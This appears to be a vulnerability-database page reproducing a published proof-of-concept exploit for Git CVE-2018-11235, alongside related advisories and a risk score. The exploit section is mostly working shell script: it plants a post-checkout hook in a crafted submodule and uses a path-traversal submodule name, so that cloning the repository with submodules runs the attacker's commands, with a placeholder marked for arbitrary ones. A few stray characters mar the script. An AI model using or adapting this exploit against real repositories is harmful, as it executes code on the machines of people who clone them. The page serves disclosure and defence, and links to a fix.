Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Git Remote Code Execution

🗓️ 01 Jun 2018 00:00:00Reported by Jameel NabboType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 59 Views

Git Remote Code Execution, CVE-2018-11235, <=2.17.1, Kali Linu

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Git < 2.17.1 - Remote Code Execution Exploit
1 Jun 201800:00
zdt
0day.today		Sourcetree Remote Code Execution Exploit
25 Jul 201800:00
zdt
FreeBSD		Libgit2 -- Fixing insufficient validation of submodule names
29 May 201800:00
freebsd
FreeBSD		Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235)
29 May 201800:00
freebsd
Tenable Nessus		Amazon Linux 2 : git (ALAS-2018-1035)
12 Jun 201800:00
nessus
Tenable Nessus		Amazon Linux AMI : git (ALAS-2018-1035)
12 Jun 201800:00
nessus
Tenable Nessus		Atlassian SourceTree 0.5.1.0 < 2.6.9 Remote Code Execution Vulnerabilities
11 Sep 201800:00
nessus
Tenable Nessus		Atlassian SourceTree 1.0b2 < 2.7.6 Remote Code Execution Vulnerabilities (Mac OSX)
11 Sep 201800:00
nessus
Tenable Nessus		CentOS 7 : git (CESA-2018:1957)
25 Jun 201800:00
nessus
Tenable Nessus		Debian DSA-4212-1 : git - security update
30 May 201800:00
nessus
Rows per page
`# Exploit Title: Git (code execution)  
# Date: 2018-05-29  
# Exploit Author: JameelNabbo  
# Website: jameelnabbo.com <http://jameelnabbo.com/>  
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>  
# CVE: CVE-2018-11235  
#Version: <=2.17.1   
# Tested on Kali Linux  
  
  
P0C:  
  
Create two files:  
pwned.sh: the file which will contain our commands to be executed   
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file  
  
add the follwing to Pwned.sh:  
#!/bin/sh  
cat << EOF  
  
#here we can put our lovely commands  
Exploited! : $(ifconfig)  
  
EOF  
  
#--------  
  
Add the follwing to commit.sh file:  
#!/bin/sh  
  
set -e  
  
repo_dir="$PWD/repo"  
#change it to any other Repo  
repo_submodule='https://github.com/JameelNabbo/SmartWorm'  
  
git init "$repo_dir"  
cd "$repo_dir"  
git submodule add "$repo_submodule" pwned  
mkdir modules  
cp -r .git/modules/pwned modules  
cp ../pwned.sh modules/pwned/hooks/post-checkout  
git config -f .gitmodules submodule.pwned.update checkout  
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned  
git add modules  
git submodule add "$repo_submodule"  
git add SmartWorm  
git commit -am pwned  
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`a  
  
  
aaaaaa  
Solution:  
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jun 2018 00:00Current
8.1High risk
Vulners AI Score8.1
EPSS0.4172
exploitcode executioncve-2018-11235gitkali linuxremotecommand injectionsecurity vulnerabilityrepositorysubmoduleupgradeedward thomson.
59